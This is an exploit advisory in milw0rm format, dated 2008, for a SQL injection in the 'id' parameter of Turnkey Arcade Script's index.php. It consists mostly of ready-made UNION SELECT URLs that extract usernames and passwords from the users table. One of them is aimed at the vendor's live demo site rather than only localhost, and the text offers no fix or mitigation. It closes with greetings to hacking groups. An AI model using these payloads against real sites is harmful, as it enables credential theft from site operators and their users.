----------------Mor0ccan Nightmares---------------- ------------------------------ Script: Turnkey Arcade Script- ------------------------------ ----------------------------------- Site: http://www.turnkeyarcade.com- ----------------------------------- ----------------------------------------------------------- Author: The_5p3ctrum <5p@linuxmail.org>- ----------------------------------------------------------- ----------------------------------------------------------------------- Business Turnkey Arcade Script (index.php id) Remote SQL Vulnerability- ----------------------------------------------------------------------- --- Ex: --- http://localhost/index.php?action=play&id=[sql] http://localhost/index.php?action=play&id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 from users -------- exploit: -------- http://localhost/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12 from users ----- Demo: ----- http://www.turnkeyarcade.com/demo/index.php?action=play&id=-21+union+select+1,2,3,username,5,password,7,8,9,10,11,12+from+users ------- Greetz: ------- Bayhay - Cyber-Zone - Drackanz - The_leo - The_Casper - Milw0rm and all my friends... # milw0rm.com [2008-11-27]